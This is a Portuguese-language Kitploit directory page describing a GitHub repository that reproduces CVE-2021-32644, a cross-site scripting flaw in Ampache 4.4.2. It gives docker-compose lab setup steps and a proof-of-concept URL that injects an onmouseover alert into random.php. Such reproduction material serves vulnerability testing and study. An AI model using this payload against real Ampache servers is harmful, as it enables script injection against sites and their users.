Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-32644 — Ampache XSS | Kitploit
Ferramentas/GitHubGitHub/dnr6419/cve-2021-32644
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubdnr6419/cve-2021-32644

CVE-2021-32644

Ampache XSS

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-32644

Esta vulnerabilidade é uma vulnerabilidade XSS que afetou versões do Ampache anteriores à 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644

Instalação e ordem de execução

1. Instalação do Ampache

Ao realizar a instalação, faça o redirecionamento de portas no arquivo docker-compose.yml. A versão do Ampache sendo instalada atualmente é a 4.4.2.

root@kitploit:~
 $docker-compose up  

2. Acessar o Ampache

Vá para http://[web-server ip]:port/.

2. Acessar o Ampache & configuração do MySQL

Vá para http://[web-server ip]:port/. Configure o banco de dados MySQL conforme mostrado na imagem abaixo. image

3. PoC

Ao inserir o PoC abaixo, é possível ver a ocorrência da vulnerabilidade XSS.

root@kitploit:~
 http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

image

Fonte

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html

Baixar ferramenta